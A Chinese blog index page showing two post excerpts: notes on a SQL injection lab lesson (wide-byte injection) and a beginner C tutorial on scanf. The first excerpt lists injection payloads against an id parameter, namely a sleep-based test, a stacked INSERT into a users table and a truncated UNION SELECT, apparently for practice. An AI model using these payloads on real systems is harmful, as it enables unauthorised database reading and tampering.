摘要: lesson-41 宽字节注入 判断注入: ?id=1 and sleep(3) 插入数据: ?id=1;insert into users (username,password) values ('44','55'); 或union select注入: -1 union select 1,2,da 阅读全文
posted @ 2023-03-07 18:52 mushangqiujin 阅读(8) 评论(0) 推荐(0)
摘要: #include <stdio.h> int main(void){ int a; scanf("%d",&a); printf("%d",a); return 0; } &符号作用是把键盘中输入的值给变量a,使用scanf()时输入数值,需要按一下enter键,主要是为了告诉程序我已经输入完了 如 阅读全文
posted @ 2023-03-07 17:42 mushangqiujin 阅读(22) 评论(0) 推荐(0)